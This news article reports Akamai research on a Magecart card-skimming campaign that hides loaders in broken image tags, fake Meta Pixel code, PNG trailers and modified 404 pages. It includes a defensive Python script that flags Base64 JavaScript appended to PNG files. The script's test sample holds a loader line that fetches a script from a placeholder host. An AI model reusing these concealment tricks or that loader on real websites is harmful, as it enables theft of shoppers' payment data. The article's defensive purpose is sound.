Magecart campaign

In what has been described as the latest phase of these attacks, a sophisticated Magecart campaign has been observed modifying websites’ default 404 error pages to hide malicious code.

According to Akamai, the activity targets Magento and WooCommerce websites, and some of the victims are large companies in the food and retail sectors.

In an analysis published on Monday, Akamai security researcher Roman Lvovsky wrote: “in this campaign, all the victim websites we detected were directly exploited, as the malicious code snippet was injected into one of their first-party resources.”

To achieve this, the code is embedded either directly in the HTML pages or inside a first-party script that is loaded as part of the website.

The attacks are carried out through a multi-stage chain in which the loader code fetches the primary payload at runtime; that payload then intercepts and exfiltrates the private data that site users submit on checkout pages.

“The purpose of separating the attack into three parts is to conceal the attack in a way that makes it more challenging to detect,” Lvovsky said. “This makes the attack more discreet and more difficult to detect by security services and external scanning tools that might be in place on the targeted website.”

“This allows for the activation of the full flow of the attack only on the specifically targeted pages; that is, because of the obfuscation measures used by the attacker, the activation of the full attack flow can only occur where the attacker intended for it to execute.”

One of the three campaign variants uses 404 error pages. The other two hide the skimmer code in the onerror attribute of a broken HTML image tag and in an inline script disguised as a Meta Pixel code snippet.

The phony Meta Pixel code retrieves, from the website’s own directory, a PNG image with a Base64-encoded string appended to the end of the image binary. When decoded, that string is a segment of JavaScript code that connects to an actor-controlled domain to fetch the second-stage payload.

“This code is responsible for carrying out various malicious activities on the targeted sensitive page, with the goals of reading the user’s sensitive personal and credit card data and transmitting it back to the skimmer’s C2 server,” Lvovsky stated.

Both of these methods are designed to evade security controls such as static analysis and external scanning, at the cost of a longer attack chain.
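A defender-side check for the PNG trick described above, added here as an example and not code from Akamai’s research or from this article: it walks a PNG’s chunk list, reports any bytes that follow the IEND chunk, and tests whether they Base64-decode to JavaScript-like text. The 1x1 test image, the loader snippet and the example.invalid domain are constructed for the demonstration.

```python
import base64
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Tokens that suggest a decoded trailer is JavaScript rather than, say, stray metadata.
JS_HINTS = re.compile(rb"\b(function|var|let|const|document|window|fetch|XMLHttpRequest)\b")

def png_trailing_data(data: bytes) -> bytes:
    """Walk the chunk list and return every byte after IEND; a well-formed PNG ends there."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4  # chunk header, chunk data, CRC
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("truncated PNG: no IEND chunk")

def inspect_png(data: bytes) -> dict:
    """Report trailing bytes and whether they Base64-decode to JavaScript-like text."""
    trailer = png_trailing_data(data)
    report = {"trailing_bytes": len(trailer), "base64_js": False, "decoded": b""}
    if not trailer:
        return report
    try:
        decoded = base64.b64decode(trailer.strip(), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return report
    report["decoded"] = decoded
    report["base64_js"] = JS_HINTS.search(decoded) is not None
    return report

def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def make_minimal_png() -> bytes:
    """Smallest useful PNG, a 1x1 8-bit grayscale image (constructed test input)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")

# Constructed sample: a loader-style snippet pointing at a placeholder domain, appended as Base64.
SAMPLE_JS = b"var s=document.createElement('script');s.src='https://example.invalid/stage2';document.head.appendChild(s);"
TAMPERED_PNG = make_minimal_png() + base64.b64encode(SAMPLE_JS)
```

Run `inspect_png` over images served from a site’s own static directories; a non-zero trailer is worth a look even when it does not decode as Base64, since a clean encoder never writes past IEND.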

The third loader variant stands out for its novel concealment method, which abuses the website’s default error page. The loader, which appears either as an inline script or as phony Meta Pixel code, sends a GET request to a non-existent URL on the website, producing a “404 Not Found” response.

That response returns a modified error page that conceals the skimmer code. The skimmer works by overlaying a fake payment form on checkout pages to collect data, which is later exfiltrated as a Base64-encoded string.

“The idea of manipulating the default 404 error page of a targeted website can offer Magecart actors various creative options for improved hiding and evasion,” Lvovsky stated.

“The request to the first-party path leading to the 404 page is another evasion technique that can bypass Content Security Policy headers and other security measures that may be actively analyzing network requests on the page.”